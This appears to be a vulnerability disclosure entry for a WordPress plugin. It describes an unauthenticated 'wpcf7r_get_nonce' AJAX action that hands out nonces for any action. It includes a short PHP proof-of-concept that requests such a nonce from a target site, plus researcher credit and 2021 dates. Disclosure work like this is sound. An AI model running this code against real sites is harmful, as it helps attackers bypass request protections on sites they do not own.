In the plugin, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
<?php // Settings $wp_url = $argv[1]; // Get nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'wpcf7r_get_nonce', 'param' => '[ANY ACTION HERE]' ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-04-20 (about 1 years ago)
2021-04-20 (about 1 years ago)
2021-04-21 (about 1 years ago)